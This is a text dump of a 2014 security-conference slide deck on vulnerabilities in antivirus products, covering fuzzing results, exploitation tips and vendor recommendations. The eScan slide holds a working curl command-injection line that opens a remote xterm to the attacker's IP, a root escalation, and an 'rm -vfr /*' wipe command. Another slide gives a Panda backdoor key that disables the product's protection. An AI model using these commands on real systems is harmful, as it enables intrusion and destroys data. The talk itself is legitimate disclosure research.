SlideShare ist ein Scribd-Unternehmen logo

2014 en breaking_av_software_joxeankoret

K
Karel Javůrek

This document discusses breaking and attacking antivirus software. It begins by outlining common features of antivirus engines like being written in C/C++ and supporting various file formats. It then discusses attacking antivirus engines by exploiting vulnerabilities in how they handle different file formats and unpack files. Specific vulnerabilities found by fuzzing various antivirus engines are presented, including heap overflows and potential remote code execution issues. Methods for exploiting antivirus engines remotely are covered, noting ways the emulators used by antivirus software can be leveraged in attacks. The document concludes by providing details on local privilege escalation vulnerabilities the author found in some antivirus products.

Präsentationen & Vorträge
1 von 90
Downloaden Sie, um offline zu lesen
Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 360, 2014
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Antivirus Engines n  Common features of AV engines: n  Written in C/C++. n  Signatures based engine + heuristics. n  On-access scanners. n  Command line/GUI on-demand scanners. n  Support for compressed file archives. n  Support for packers. n  Support for miscellaneous file formats. n  Advanced common features: n  Packet filters and firewalls. n  Drivers to protect the product, anti-rootkits, etc... n  Anti-exploiting toolkits.
Antivirus products or engines n  An antivirus engine is just the core, the kernel, of an antivirus product. n  Some antivirus engines are used by multiple products. n  For example, BitDefender is the most widely used antivirus kernel. n  It's used by so many products like G-Data, eScan, F- Secure, etc... n  Most “big” antivirus companies have their own engine but not all. And some companies, like F-Secure, integrate 3rd party engines in their products. n  In general, during this talk I will refer to AV engines, to the kernels, except when specified the word “product”.
Attack surface n  Fact: installing an application in your computer makes you a bit more vulnerable. n  You just increased your attack surface. n  If the application is local: your local attack surface increased. n  If the application is remote: your remote attack surface increased. n  If your application runs with the highest privileges, installs kernel drivers, a packet filter and tries to handle anything your computer may do... n  Your attack surface dramatically increased.
Myths and reality n  Antivirus propaganda: n  “We make your computer safer with no performance penalty!” n  “We protect against unknown zero day attacks!”. n  Reality: n  AV engines makes your computer more vulnerable with a varying degree of performance penalty. n  The AV engine is as vulnerable to zero day attacks as the applications it tries to protect from. n  And can even lower the operating system exploiting mitigations, by the way...
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Attacking antivirus engines n  AV engines, commonly, are written in non managed languages due to performance reasons. n  Almost all engines written in C and/or C++ with only a few exceptions, like the old MalwareBytes, written in VB6 (!?). n  It translates into buffer overflows, integer overflows, format strings, etc... n  Most AV engines installs operating system drivers. n  It translates into possible local escalation of privileges. n  AV engines must support a long list of file formats: n  Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... n  It translates into bugs in the parsers of such file formats.
Attacking antivirus engines n  AV engines not only need to support such large list of file formats but they also need to do this quickly and better than the vendor. n  If an exploit for a new file format appears, customer will ask for support for such files as soon as possible. The longer it takes, the higher the odds of losing a customer moving on to another vendor. n  The producer doesn't need to “support” malformed files. The AV engine actually needs to do so. n  The vendor needs to handle malformed files but only to refuse them as repairing such files is an open door for vulnerabilities. n  Example: Adobe Acrobat
Attacking antivirus engines n  Most (if not all...) antivirus engines run with the highest privileges: root or local system. n  If one can find a bug and write an exploit for the AV engine, (s)he just won root or system privileges. n  Most antivirus engines updates via HTTP only protocols: n  If one can MITM the connection (for example, in a LAN) one can install new files and/or replace existing installation files. n  It often translates in completely owning the machine with the AV engine installed as updates are not commonly signed. Yes. They aren't. n  I will show later one of the many vulnerable products...
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Vulnerabilities in AV engines n  Started around end of July/beginning of August to find vulnerabilities, for fun, in some AV engines. n  In my spare time, some hours from time to time. n  Found remote and local vulnerabilities in 14 AV engines or AV products. n  Most of them in the first 2 months. n  I tested ~17 engines (I think, I honestly do not remember). n  It says it all. n  I'll talk about some of the vulnerabilities I discovered. n  The following are just a few of them...
AV engines vulnerabilities n  Avast: Heap overflow in RPM (reported, fixed and paid Bug Bounty) n  Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers n  Avira: Multiple remote vulnerabilities n  BitDefender: Multiple remote vulnerabilities n  ClamAV:Infinite loop with a malformed PE (reported & fixed) n  Comodo: Heap overflow with Chm n  DrWeb: Multiple remote vulnerabilities (vulnerability with updating engine fixed) n  ESET: Integer overflow with PDF (fixed)/Multiple vulnerabilities with packers n  F-Prot: Heap overflows with multiple packers n  F-Secure: Multiple vulnerabilities in Aqua engine (all the F-Secure own bugs fixed) n  Panda: Multiple local privilege escalations (reported and partially fixed) n  eScan: Multiple remote command injection (all fixed? LOL, I doubt...) n  And many more...
How to find such vulnerabilities? n  In my case I used, initially, Nightmare, a fuzzing testing suite of my own. n  Downloaded all the AV engines with a Linux version I was able to find. n  The core is always the same with the only exception of some heuristic engines. n  Also used some tricks to run Windows only AV engines in Linux. n  Fuzzed the command line tool of each AV engine by simply using radamsa + the testing suite of ClamAV, many different EXE packers and some random file formats. n  Results: Dozens of remotely exploitable vulnerabilities. n  Also, I performed basic local and remote checks: n  ASLR, null ACLs, updating protocol, network services, etc...
Fuzzing statistics n  A friend of mine convinced me to write a fuzzer and do a “Fuzzing explained” like talk for a private conference. n  Really simple fuzzing engine with a max. of 10 nodes. n  I'm poor... I cannot “start relatively small, with 300 boxes” like Google people does. n  Used this fuzzing suite to fuzz various Linux based AV engines, those I was able to run and debug. n  For that specific talk I did fuzz/test the following ones: n  BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG. n  Results...
Initial experiment results n  ClamAV: 1 Remote DOS with a malformed icon resource directory in a PE. n  Avast: One possible RCE due to an uninitialized variable in code handling RPM archives. n  F-Secure: One memory exhaustion bug with CPIO. n  Comodo: 2 heap overflows, one handling CHM files. n  F-Prot: Armadillo, PECompact, ASPack and Yoda's Protector unpackers heap overflows. n  AVG: CPIO and XAR heap overflows. n  BitDefender: Amazing number of bugs. Many likely exploitables.
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Exploiting AV engines n  What will be briefly covered: n  Remote exploitation. n  What will be not: n  Local exploitation of local user-land or kernel-land vulnerabilities. n  I have no knowledge about kernel-land, sorry. n  Later on, I will discuss some local vulnerability and give details about how to exploit it but it isn't kernel stuff and is too easy to exploit.
Exploiting AV engines n  Exploiting an AV engine is like exploiting any other client-side application. n  Is not like exploiting a browser or a PDF reader. n  Is more like exploiting an Office file format. n  Exploiting memory corruptions in client-side applications remotely can be quite hard nowadays due to ASLR. n  However, AV engines makes too many mistakes too often so, don't worry ;) n  ...
Exploiting AV engines n  In general, AV engines are all compiled with ASLR enabled. n  But it's common that only the core modules are compiled with ASLR. n  Not the GUI related programs and libraries, for example. n  Some libraries of the core of some AV engines are not ASLR enabled. n  Check your target/own product, there isn't only one ;)
Exploiting AV engines n  Even in “major” AV engines... n  ...there are non ASLR enabled modules. n  ...there are RWX pages at fixed addresses. n  ...they disable DEP. n  Under certain conditions, of course. n  The condition, often, is the emulator.
Exploiting AV engines n  The x86 emulator is a key part of an AV engine. n  It's used to unpack samples in memory, to determine the behaviour of an executable program, etc... n  Various AV engines create RWX pages at fixed addresses and disable DEP as long as the emulator is used. n  Very common. Does not apply to only some random AV engine. n  ...
Exploiting AV engines (more tips) n  By default, an AV engine will try to unpack compressed files and scan the files inside. n  A compressed archive file (zip, tgz, rar, ace, etc...) can be created with several files inside. n  The following is a common AV engines exploitation scenario: n  Send a compressed zip file. n  The very first file inside forces the emulator to be loaded and used. n  The 2nd one is the real exploit.
Exploiting AV engines n  AV engines implement multiple emulators. n  There are emulators for x86, AMD64, ARM, JavaScript, VBScript, …. in most of the “major” AV engines. n  The emulators, as far as I can tell, cannot be used to perform heap spraying, for example. But they expose a considerable attack surface. n  It's common to find memory leaks inside the emulators, specially in the JavaScript engine. n  They can be used to construct complex exploits as we have a programming interface to craft inputs to the AV engine.
Exploiting AV engines: Summary n  Exploiting AV engines is not different to exploiting other client-side applications. n  They don't have/offer any special self-protection. They rely on the operating system features (ASLR/DEP) and nothing else. n  And sometimes they even disable such features. n  There are programming interfaces for exploit writers: n  The emulators: x86, AMD-64, ARM, JavaScript, ... usually. n  Multiple files doing different actions each can be send in one compressed file as long as the order inside it is kept. n  Owning the AV engine means getting root or system in all AV engines I tested. There is no need for a sandbox escape, in general.
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Details about some vulnerabilities in AV engines and products... Extracted from http://theoatmeal.com/comics/grump Copyright © Matthew Inman
Disclaimer n  I'm only showing a few of my vulnerabilities. n  I have the bad habit of eating 3 times a day... n  I contacted 5 vendors for different reasons: n  Avast. They offer a Bug Bounty. Well done guys! n  ClamAV. Their antivirus is Open Source. n  Panda. I have close friends there. n  Ikarus, ESET and F-Secure. They contacted me an asked for help nicely. n  I do not “responsibly” contact irresponsible multi-million dollar companies. n  I don't give my research for free. n  Audit your products...
Local Escalation of Privileges
Example: Panda Multiple local EoPs n  In the product Global Protection 2013 there were various processes running as SYSTEM. n  Two of those processes had a NULL process ACL: n  WebProxy.EXE and SrvLoad.EXE n  We can use CreateRemoteThread to inject a DLL, for example. n  Two very easy local escalation of privileges. n  But the processes were “protected” by the shield.
Example: Panda Multiple local EoPs n  Another terrible bug: The Panda's installation directory had write privileges for all users. n  However, again, the directory was “protected” by the shield... n  What is the fucking shield? n  ...
Example: Panda Multiple local EoPs n  The Panda shield is a driver that protects some Panda owned processes, the program files directory, etc... n  It reads some registry keys to determine if the shield is enabled or disabled. n  But... the registry key is world writeable. n  Also, it's funny, but there is a library (pavshld.dll) with various exported functions... n  ...
Example: Panda Multiple local EoPs n  All exported functions contains human readable names. n  All but the 2 first functions. They are called PAVSHLD_001 and 002. n  Decided to reverse engineer them for obvious reasons... n  The 1st function is a backdoor to disable the shield. n  It receives only 1 argument, a “secret key” (GUID): n  ae217538-194a-4178-9a8f-2606b94d9f13 n  If the key is correct, then the corresponding registry keys are written. n  Well, is easier than writing yourself the registry entries...
MOAR PANDAZ n  There are more stupid bugs in this AV engine... n  For example, no library is compiled with ASLR enabled. n  One can write a reliable exploit for Panda without any real big effort. n  And, also, one can write an exploit targeting Panda Global Protection users for any program. n  Why? Because the product injects 3 libraries without ASLR enabled in all processes. Yes.
Panda n  I reported the vulnerabilities because I have friends there. n  Some of them are (supposedly) fixed, others not... n  The shield backdoor. n  The permissions of the Panda installation directory.
ASLR related (Address Space Layout Randomization)
ASLR disabled n  We already discussed that Panda Global Protection doesn't enable ASLR for all modules. n  Do you believe this is an isolated problem of just one antivirus product? n  As it is common with antivirus products/ engines, such problems are not specific...
One example...
Forticlient n  The process av_task.exe is the actual AV scanner...
Forticlient n  Most libraries and binaries in Forticlient doesn't have ASLR enabled. n  Exploiting Forticlient with so many non ASLR enabled modules once a bug is found is trivial. n  You may think that this is a problem that doesn't happen to the “big” ones... n  Think again.
2 random AVs nobody uses...
Kaspersky n  Before SyScan 2014 Singapore, the libraries avzkrnl.dll and module vlns.kdl, a vulnerability scanner (LOL), were not ASLR enabled. n  One can write a reliable exploit for Kaspersky AV without any real effort.
Kaspersky n  After SyScan 2014 Singapore, after making those ASLR bypasses publicly available to any body, they still didn't fix them. n  I don't know what to say... But it seems they simply don't care, like most of the AV companies in the industry. n  Why bother fixing this issue if the scanner is running as system with the highest integrity level and without any kind of sandboxing?
BitDefender n  It's kind of easier to write an exploit for BitDefender... “Security service” my ass...
BKAV n  BKAV is a Vietnamese antivirus product. n  Gartner recognizes it as a “Cool vendor in Emerging Markets”. n  I recognize it as a “Cool antivirus for writing targeted exploits”...
BKAV n  They don't have ASLR enabled for their services...
BKAV n  And, like Panda, they inject a non ASLR enabled library system wide, the Bkav “firewall” engine... n  ...miserably failing at securing your computer. n  BTW, this vulnerability was made PUBLIC months ago, in SyScan 2014 Singapore.
AV developers writing security software
Remote Denial of Service
Examples: ClamAV DOS n  There is a bug in ClamAV scanning icon resource directories. n  If the number is too big, ClamAV would loop almost forever. n  Fixed by adding more limits to the engine. n  Found via dumb ass fuzzing. n  Reported. Because it's Open Source... n  https://bugzilla.clamav.net/show_bug.cgi?id=10650 n  The vulnerability was nicely handled by the ClamAV team (now Cisco).
Decompression bombs (multiple AVs) n  Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001. n  A compressed file with many compressed files inside or with really big files inside. n  It can be considered a remote denial of service. n  Do you think AV engines are not vulnerable any more to such bugs with more than +10 years? n  In this case, you're wrong. n  Look to the following table....
Failing AVs ZIP GZ BZ2 RAR 7Z ESET X (***) X (***) BitDefender X Sophos X (*) X X X Comodo X AVG X Ikarus X Kaspersky X (**) * Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB of RAM. ** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. *** In my latest testing, ESET finishes after 1 minute with each file in my “small testing machine”.
BitDefender engine n  BitDefender is a Romanian antivirus engine. n  Their AV core is the most widely distributed AV engine in other AV products. n  To name a few: F-Secure, G-Data, eScan, LavaSoft, Immunet, ... n  It suffers from a number of vulnerabilities like almost all other AV engines/products out there. n  Finding vulnerabilities in this engine is trivial. n  Some easy examples...
BitDefender bugs n  (Vulnerability fixed) Modifying 2 DWORDs in a PE file packed with Shrinker3 packer used to crash it: n  Those bytes were used to calculate the file and sections alignment of the new, in memory, unpacked PE file. n  When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment were set to 0...
BitDefender bugs n  ...and their values were used, later on, in some arithmetic operations: n  Those 2 bugs were trivial to discover. But they failed to find them by themselves...
One more complex BitDefender bug... n  (Vulnerability fixed) Modifying a single byte in a Thinstall installer would make it to crash: n  After modifying one byte, the decompressed content would get corrupt. And index to a table was calculated with the corrupted content... and data likely controlled by the attacker was copied to a position also likely controllable. n  Again: this bug was trivial to discover. TRIVIAL.
BitDefender notes n  This and all BitDefender's bugs don't affect exclusively BitDefender's products. n  It affects many AV products out there as previously mentioned. n  Adding a new AV engine to your product may sound “cool” but you're making 3rd party bugs yours. n  And, by the way, you didn't audit it before adding to your product... n  Otherwise, I doubt you would have added it.
ESET Nod32 n  ESET Nod32 is a well known Slovak AV engine. n  Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered. n  One little example: a malformed PDF file. n  A negative or big value for any element of a /W(idth) element with arrays used to crash it. n  A simple remote denial of service.
ESET Nod32 bug with PDF files n  According to ESET sources they use fuzzing as part of QA. n  I think they are not doing it very well... n  Finding this bug was trivial, like all the ones I previously shown. n  This bug was reported and fixed by ESET.
Remote Code Execution
DrWeb antivirus n  DrWeb is a russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers. n  More of their propaganda (the original web page I got this information from is inaccessible since I disclosed just 1 vulnerability during SyScan 2014 Singapore):
DrWeb updating protocol n  DrWeb used (still does it?) to update via HTTP only. They do not use SSL/TLS. n  It used to download a catalog file first: n  Example for Linux: n  http://<server>/unix/700/drweb32.lst.lzma n  In the catalog file there was a number of updatable files + a hash for them: n  VDB files (Virus DataBases). n  DrWeb32.dll. n  The hash was, simply, a CRC32 and no component was signed, even the DrWeb32.dll library.
DrWeb updating protocol n  The “highest grade of certificate from the government” used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol. n  To exploit in a LAN intercepting these domains was enough: n  update.nsk1.drweb.com n  update.drweb.com n  update.msk.drweb.com n  update.us.drweb.com n  update.msk5.drweb.com n  update.msk6.drweb.com n  update.fr1.drweb.com n  update.us1.drweb.com n  update.nsk1.drweb.com n  ...and replacing drweb32.dll with your “modified” (lzma'ed) version.
DrWeb updating protocol n  Exploiting it was rather easy with ettercap and a quick Python web server + Unix lzma tool. n  You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file. n  I tested the bug under Linux: full code execution is possible. n  Though you need to be in a LAN to be able to do so, obviously. n  One Russian guy wrote a Metasploit exploit for Windows: n  http://habrahabr.ru/post/220113/ n  In my opinion, this updating protocol (is?) was horrible.
DrWeb updating protocol vulnerability n  The vulnerability was fixed and “an alert” issued. n  In the “alert” they do not say they fixed a vulnerability. n  http://news.drweb.com/?i=4372&c=5&lng=ru&p=0 n  The alert is not available in English, only Russian and, I think, Chinese. n  They only said that changes were made to increase the security of the update procedure. n  Technically true: From no security to some security. n  I did not research the update. It can be fun as I'm 99% sure they are doing it wrong. n  I had no time to check for this conference, sorry :(
eScan for Linux n  I was bored some random night in Singapore and found that the eScan product have a Linux version. n  I downloaded and installed it (~1 hour because of the awful hotel's connection). n  Then I started checking what it installs, finding for SUID binaries, etc... n  They use BitDefender and ClamAV engines, they don't have their own engine so, no need to test the scanners. n  I already had vulnerabilities for such engines... n  They install a Web server for management and a SUID binary called: n  /opt/MicroWorld/sbin/runasroot
eScan for Linux n  The SUID binary allows to execute root commands to the following users: n  root n  mwconf (created during installation). n  The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently. n  A command injection in the login form (PHP). n  In a “security” product. n  Yes.
eScan for Linux login page
eScan for Linux remote root n  This specific bug required to know/guess an existing user. Not so hard. n  People from Immunity discovered more bugs that didn't require to guess a user name and used this application as a vuln-hunting teaching tool. n  The application is buggy as hell. It's only good for learning what not to do or how to write easy exploits, as a tutorial. n  The user name and the password were used to construct an operating system command executed via the PHP's function “exec”. n  I was not able to inject in the user name. n  But I was able to inject in the password. n  ...
Source code of login.php (I)
Source code of login.php (II) n  The password sent to the user was passed to check_user: n  There were some very basic checks against the password. n  Specially for shell escape characters. n  But they forgot various other characters like ';'.
Source code of common_functions.php n  Then, the given password was used in the function check_user like this:
eScan for Linux RCE n  My super-ultra-very-txupi-complex exploit for it: $ xhost + $ export TARGET=http://target:10080 $ curl --data "product=1&uname=valid@user.com&pass=1234567; DISPLAY=YOURIP:0;xterm;" $TARGET/login.php n  Once you're in, run this to escalate privileges: $ /opt/MicroWorld/sbin/runasroot /usr/bin/ xterm n  Or anything else you want... $ /opt/MicroWorld/sbin/runasroot rm -vfr /*
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Conclusions n  In general, AV software... n  ...doesn't make you any safer against skilled attackers. n  ...increase your attack surface. n  ...make you more vulnerable to skilled attackers. n  ...are as vulnerable to attacks as any other application. n  Some AV software... n  ...may lower your operating system protections. n  ...are plagued of both local and remote vulnerabilities. n  Some AV companies... n  ...don't give a fuck about security in their products.
Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
Recommendations for AV users n  Do not blindly trust your AV product. n  BTW, do not trust your AV product. n  Also, do not trust your AV product. n  Nope. I cannot stress it enough. n  Isolate the machines with AV engines used for gateways, network inspection, etc... n  Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
Recommendations for AV companies n  Audit your products: source code reviews & fuzzing. n  No, AV comparatives and the like are not even remotely close to this. n  Running a Bug Bounty, like Avast, is a very good idea too. n  Do not use the highest privileges possible for scanning network packets, files, etc... n  You don't need to be root/system to scan a network packet or a file. n  You only need root/system to get the contents of that packet or file. n  Send the network packet or file contents to another, low privileged or sandboxed, process.
Recommendations for AV companies n  Run dangerous code under an emulator, vm or, at the very least, in a sandbox. I only know 1 AV using this approach. n  The file parsers written in C/C++ code are very dangerous. n  If one finds a vulnerability and it's running inside an emulator/ sandbox one needs also an escape vulnerability to completely own the AV engine. n  Why is it harder to exploit browsers than security products? n  Or use a “safer” language. Some AV products, actually, are doing this: Using Lua, for example. n  Do not trust your own processes. They can be owned. n  I'm not talking about signing the files. n  I'm talking about your AV's running processes.
Recommendations for AV companies n  Do not use plain HTTP for updating your product. n  Use SSL/TLS. n  Also, digitally sign all files. n  No, CRC is not a signature. Really. n  ...and verify there is nothing else after the signature. n  Also, verify the whole certification chain...
Recommendations for AV companies n  Drop old code that is of no use today or make this code not available by default. n  Code for MS-DOS era viruses, packers, protectors, etc... n  Parsers for file format vulnerabilities in completely unsupported products nowadays. n  Such old code not touched in years is likely to have vulnerabilities. n  Ignore any antivirus comparative company asking you to detect malwares from the Jurassic era. Avoid them.
Questions?

Empfohlen

Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)Akmal Hisyam
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerJoxean Koret
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av softwareThomas Pollet
 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingPacSecJP
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingVlatko Kosturjak
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014Martin Hron
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator
Windows Offender: Reverse Engineering Windows Defender's Antivirus EmulatorWindows Offender: Reverse Engineering Windows Defender's Antivirus Emulator
Windows Offender: Reverse Engineering Windows Defender's Antivirus EmulatorPriyanka Aash
 

Empfohlen

Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)Akmal Hisyam
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerJoxean Koret
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av softwareThomas Pollet
 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingPacSecJP
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingVlatko Kosturjak
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014Martin Hron
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator
Windows Offender: Reverse Engineering Windows Defender's Antivirus EmulatorWindows Offender: Reverse Engineering Windows Defender's Antivirus Emulator
Windows Offender: Reverse Engineering Windows Defender's Antivirus EmulatorPriyanka Aash
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Sarath C
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engFFRI, Inc.
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisTamas K Lengyel
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer OverflowEric alleshouse
 
Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflowEric alleshouse
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenTamas K Lengyel
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflowقصي نسور
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenTamas K Lengyel
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingTamas K Lengyel
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel HackingDeveler S.r.l.
 
Program Spring ´15
Program Spring ´15Program Spring ´15
Program Spring ´15Sofia Nyblom
 
Escolas Privadas
Escolas PrivadasEscolas Privadas
Escolas PrivadasFilipe Alves
 

Weitere ähnliche Inhalte

Was ist angesagt?

Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Sarath C
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engFFRI, Inc.
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisTamas K Lengyel
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflowEric alleshouse
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenTamas K Lengyel
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
